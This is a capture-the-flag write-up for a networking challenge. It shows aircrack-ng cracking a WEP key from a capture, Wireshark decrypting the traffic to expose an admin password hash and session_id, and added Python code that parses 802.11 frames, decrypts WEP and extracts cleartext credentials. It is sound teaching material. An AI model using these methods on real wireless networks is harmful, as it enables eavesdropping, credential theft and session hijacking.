June 22, 2019
Website: https://uscc.cyberquests.org/
This Cyber Quest covers a wide range of topics on networking, including firewalls, routers, Wi-Fi, and packet analysis.
Tools that you may need include Wireshark, aircrack-ng, and exiftool (all of which are included in many security-focused Linux distributions, including Kali Linux).
Some questions refer to files contained within this ZIP file: Spring 2019 Cyber Quest Resources.
We will use aircrack-ng to analyze the capture file and get the BSSID of the WAP.
01) Install Aircrack-ng
https://www.aircrack-ng.org/doku.php?id=install_aircrack
02) Open a terminal and run the aircrack-ng command as follows:

$ aircrack-ng WiFi.pcap
Opening WiFi.pcap
please wait...
Read 53337 packets.

   #  BSSID              ESSID                     Encryption

   1  24:F5:A2:11:F7:6A  Home_Net                  WEP (0 IVs)

Choosing first network as target.

Opening WiFi.pcap
please wait...
Read 53337 packets.

1 potential targets

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15273 ivs.

                                 Aircrack-ng 1.5.2

                   [00:00:03] Tested 2792 keys (got 15273 IVs)

   KB    depth   byte(vote)
    0    1/  5   6B(21760) 0B(19968) CF(19968) B5(19712) 98(19200) E8(19200)
    1    0/  2   F7(23808) 17(21760) 19(20224) BB(19968) 10(19968) 9F(19712)
    2    1/  6   F7(21760) 60(20992) 1B(20736) 98(20480) 0E(20224) 91(19456)
    3    7/ 11   3F(19456) 1A(19200) C3(19200) E6(19200) 91(18944) 6B(18944)
    4    3/  5   A6(20224) 94(19968) C2(19456) BE(19456) 8D(19200) 2A(19200)

             KEY FOUND! [ 6B:F7:F7:3F:FC ]
        Decrypted correctly: 100%
The BSSID of the WAP >
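The network list that aircrack-ng prints above (BSSID, ESSID, encryption, IV count) comes straight from the 802.11 headers in the capture. The following is an added example, not part of the original write-up and not aircrack-ng code: a small pure-Python reader for a raw 802.11 pcap (link type 105, no radiotap header) that pulls the BSSID and ESSID out of beacon frames, reads the Privacy bit and RSN tag to classify the network as OPN/WEP/WPA2, and counts the distinct WEP IVs seen in protected data frames. The capture it analyses is constructed inline (the Home_Net BSSID and ESSID are taken from the output above; the second network, the station MAC, the IVs and the timestamps are made-up values), and a real capture with a radiotap header would need that header skipped first.

```python
import struct

LINKTYPE_IEEE802_11 = 105   # raw 802.11 frames without a radiotap header


def mac(b):
    return ':'.join(f'{x:02X}' for x in b)


def build_pcap(frames, linktype=LINKTYPE_IEEE802_11):
    """Wrap raw frames in a classic little-endian pcap file (constructed test data)."""
    out = [struct.pack('<IHHiIII', 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)]
    for i, f in enumerate(frames):
        out.append(struct.pack('<IIII', 1561161600 + i, 0, len(f), len(f)) + f)
    return b''.join(out)


def beacon_frame(bssid, essid, privacy, rsn=False):
    """Management/beacon frame: addr1=broadcast, addr2=addr3=BSSID, fixed fields, tagged params."""
    hdr = b'\x80\x00' + b'\x00\x00' + b'\xff' * 6 + bssid + bssid + b'\x00\x00'
    capability = 0x0001 | (0x0010 if privacy else 0)      # ESS bit, Privacy bit
    fixed = struct.pack('<QHH', 0, 100, capability)        # timestamp, beacon interval, capability
    tags = bytes([0, len(essid)]) + essid.encode() + bytes([1, 1, 0x82])   # SSID, supported rates
    if rsn:
        tags += bytes([48, 2, 1, 0])                       # minimal RSN tag (version 1) marks WPA2
    return hdr + fixed + tags


def wep_data_frame(bssid, iv):
    """Data frame sent by the AP (FromDS=1, Protected=1); the body starts with IV + key-id byte."""
    station = bytes.fromhex('001122334455')                # constructed client MAC
    hdr = b'\x08\x42' + b'\x00\x00' + b'\xff' * 6 + bssid + station + b'\x00\x00'
    return hdr + iv + b'\x00' + b'\x00' * 20               # 20 dummy ciphertext bytes


def iter_pcap(data):
    magic, = struct.unpack_from('<I', data, 0)
    if magic != 0xA1B2C3D4:
        raise ValueError('expected a little-endian classic pcap file')
    linktype, = struct.unpack_from('<I', data, 20)
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f'link type {linktype} not handled here (radiotap captures need the header skipped)')
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from('<IIII', data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_tags(frame, off):
    """Tagged parameters are TLVs: id(1) len(1) value; keep the first occurrence of each id."""
    tags = {}
    while off + 2 <= len(frame):
        tag_id, tag_len = frame[off], frame[off + 1]
        tags.setdefault(tag_id, frame[off + 2:off + 2 + tag_len])
        off += 2 + tag_len
    return tags


def summarize(pcap_bytes):
    """Return {bssid: {'essid', 'encryption', 'ivs'}}, the information aircrack-ng lists per network."""
    nets = {}

    def entry(bssid):
        return nets.setdefault(bssid, {'essid': None, 'encryption': None, 'ivs': set()})

    for frame in iter_pcap(pcap_bytes):
        if len(frame) < 24:
            continue
        fc0, fc1 = frame[0], frame[1]
        ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
        addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
        if ftype == 0 and subtype == 8:                      # beacon
            capability, = struct.unpack_from('<H', frame, 34)
            tags = parse_tags(frame, 36)
            e = entry(mac(addr3))
            e['essid'] = tags.get(0, b'').decode('utf-8', 'replace')
            if 48 in tags:
                e['encryption'] = 'WPA2'
            else:
                e['encryption'] = 'WEP' if capability & 0x0010 else 'OPN'
        elif ftype == 2 and fc1 & 0x40:                      # protected data frame
            to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
            if to_ds and not from_ds:
                bssid = addr1
            elif from_ds and not to_ds:
                bssid = addr2
            elif not to_ds and not from_ds:
                bssid = addr3
            else:
                continue                                     # 4-address WDS frames are skipped
            hlen = 26 if subtype & 0x8 else 24                # QoS data frames carry 2 extra header bytes
            entry(mac(bssid))['ivs'].add(frame[hlen:hlen + 3])
    return nets


def sample_capture():
    """Constructed capture: the WEP network from the output above plus an open and a WPA2 network."""
    home, guest, office = bytes.fromhex('24F5A211F76A'), bytes.fromhex('02AABBCCDDEE'), bytes.fromhex('02112233AABB')
    frames = [beacon_frame(home, 'Home_Net', True), beacon_frame(guest, 'Guest_Open', False),
              beacon_frame(office, 'Office', True, rsn=True),
              wep_data_frame(home, b'\x01\x02\x03'), wep_data_frame(home, b'\x01\x02\x03'),   # reused IV
              wep_data_frame(home, b'\x0a\x0b\x0c')]
    return build_pcap(frames)


if __name__ == '__main__':
    print('   #  BSSID              ESSID        Encryption')
    for i, (bssid, n) in enumerate(summarize(sample_capture()).items(), 1):
        enc = n['encryption'] + (f" ({len(n['ivs'])} IVs)" if n['encryption'] == 'WEP' else '')
        print(f"   {i}  {bssid}  {n['essid']:<12} {enc}")
```

Two things the counter makes visible that the tool output only implies: the "IVs" aircrack-ng reports are the 24-bit per-frame values that WEP prepends in the clear, and the reused IV in the constructed data (three protected frames, two distinct IVs) is exactly the weakness the PTW attack above exploits, which is why the number of captured IVs, not the number of packets, decides how fast a WEP key falls.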
01) Open the file in Wireshark.
02) From the upper menu select Statistics > Capture File Properties:

Capture length is >
From our aircrack-ng output above:

WEP key >
01) Open the file in Wireshark.
02) To add the WEP key so Wireshark can decrypt the traffic, from the upper menu select Wireshark -> Preferences. You should see a window that looks like this:

Select Protocols -> IEEE 802.11 > Decryption keys [edit], then add the WEP key from the previous answer without colons: 6BF7F73FFC
03) Let's search for all packets that contain session_id and the word admin using this filter:

tcp contains "session_id" && tcp contains "admin"

Notice the packet info POST /login.cgi HTTP/1.1, which is a login packet.
04) Let's examine this packet: in the packet details pane, expand HTML Form URL Encoded: application/x-www-form-urlencoded and you will find the admin login details:

Form item: "http_username" = "admin"
Form item: "http_passwd" = "ba41d75ebd1339f3a420da1db2c48dc2"

Then expand Hypertext Transfer Protocol. You will find that admin was granted a session_id after the successful login: session_id=f29e8307513709b98b88b8e029bb7f53

Let's check the rest of the packets. Try this filter to view POST method packets:

http.request.method == "POST"

You will find admin applying some configuration to the device with the same session id. To view the packet data, right click on a packet > Follow > TCP Stream.

Session_id assigned to the administrator of the network device >
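What Wireshark does once the key is entered under Decryption keys is mechanical: for every protected frame it seeds RC4 with the frame's 3-byte IV followed by the 5-byte key, decrypts the body, and checks the trailing CRC-32 ICV. The following is an added example, not part of the original write-up and not Wireshark's code, that performs that decryption in plain Python and then parses the recovered HTTP requests the way steps 03 and 04 read them by hand, reporting the username, any password-like form field sent in the clear, and the session_id reused by later configuration requests. The frames are constructed inline with the key recovered above; the host address, password value and session id are placeholders, and the HTTP text is placed directly in the WEP payload, whereas a real frame would carry LLC/SNAP, IP and TCP headers in front of it and the request could span several segments.

```python
import struct
import zlib
from urllib.parse import parse_qs

WEP_KEY = bytes.fromhex('6BF7F73FFC')          # the 40-bit key recovered by aircrack-ng above


def rc4(key, data):
    """Plain RC4 (key scheduling + keystream); WEP seeds it with IV || key for every frame."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack('<I', zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """WEP body layout: IV(3) | key-id/pad(1) | RC4(IV||key)(plaintext || ICV)."""
    return iv + b'\x00' + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key, body):
    """Reverse of the above; a failing ICV means the wrong key (or a corrupted frame)."""
    iv, ciphertext = body[:3], body[4:]
    plain = rc4(iv + key, ciphertext)
    data, tag = plain[:-4], plain[-4:]
    if icv(data) != tag:
        raise ValueError('ICV mismatch: wrong WEP key or corrupted frame')
    return data


def parse_http_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, form-urlencoded body."""
    head, _, body = raw.partition(b'\r\n\r\n')
    lines = head.decode('latin-1').split('\r\n')
    method, path, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    form = {}
    if 'application/x-www-form-urlencoded' in headers.get('content-type', ''):
        form = {k: v[0] for k, v in parse_qs(body.decode('latin-1')).items()}
    return {'method': method, 'path': path, 'headers': headers, 'form': form}


CREDENTIAL_HINTS = ('passwd', 'password', 'pwd')   # field names that signal a credential in the clear


def analyze(key, bodies):
    """Decrypt each WEP body and report what the cleartext HTTP POSTs expose."""
    findings = []
    for body in bodies:
        req = parse_http_request(wep_decrypt(key, body))
        if req['method'] != 'POST':
            continue
        findings.append({
            'path': req['path'],
            'username': req['form'].get('http_username'),
            'session_id': req['form'].get('session_id'),
            'cleartext_credential': any(h in k.lower() for k in req['form'] for h in CREDENTIAL_HINTS),
        })
    return findings


SESSION_ID = '0123456789abcdef0123456789abcdef'   # constructed placeholder, not the value from the capture


def sample_bodies():
    """Two constructed frames: the login POST, then a configuration change reusing the session id."""
    def request(path, form):
        return (f'POST {path} HTTP/1.1\r\nHost: 192.0.2.1\r\n'             # placeholder router address
                f'Content-Type: application/x-www-form-urlencoded\r\n'
                f'Content-Length: {len(form)}\r\n\r\n{form}').encode()
    login = request('/login.cgi', 'http_username=admin&http_passwd=md5-placeholder')
    apply = request('/apply.cgi', f'session_id={SESSION_ID}&action=apply&wlan_channel=6')
    return [wep_encrypt(WEP_KEY, b'\x11\x22\x33', login),
            wep_encrypt(WEP_KEY, b'\x44\x55\x66', apply)]


if __name__ == '__main__':
    for finding in analyze(WEP_KEY, sample_bodies()):
        print(finding)
```

Two defensive observations fall out of running it: the ICV is a CRC, not a MAC, so a passing check only says the key matches, not that the frame is authentic; and everything the router exchanged after that, the hashed password field and the session_id that later requests carry, was protected by nothing but a 40-bit WEP key and an HTTP (not HTTPS) admin interface, which is why the same session id can be read straight out of the following POSTs.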
References:
https://wiki.wireshark.org/HowToDecrypt802.11